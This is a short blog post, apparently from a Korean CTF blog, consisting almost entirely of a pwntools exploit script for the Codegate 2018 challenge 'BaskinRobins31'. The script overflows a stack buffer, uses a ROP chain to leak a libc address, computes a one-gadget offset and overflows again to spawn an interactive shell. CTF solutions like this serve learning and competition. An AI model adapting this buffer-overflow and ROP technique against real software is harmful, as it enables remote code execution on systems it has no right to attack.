ctf

[Codegate 2018 CTF] BaskinRobins31

woodonggyu 2018. 2. 8. 18:45

# exploit.py


from pwn import *
from time import *

p = process('./BaskinRobins31')
#p = remote('ch41l3ng3s.codegate.kr', 3131)

sleep(0.3)
print p.recv(1024)

payload = str('3') + 'A'*183
payload += p64(0x40087a) + p64(0x1) + p64(0x602040) + p64(0x10) + p64(0x4006d0)
payload += p64(0x4008a4)

p.sendline(payload)

data = p.recv(1024)

read = u64(data[237:245])
libc = read - 0xf7250
oneshot = libc + 0x45216

log.info('read = ' + hex(read))
log.info('libc = ' + hex(libc))
log.info('oneshot = ' + hex(oneshot))

r_payload = 'A'*184
r_payload += p64(oneshot)

p.sendline(r_payload)

p.interactive()

 

저작자표시 비영리 변경금지 (새창열림)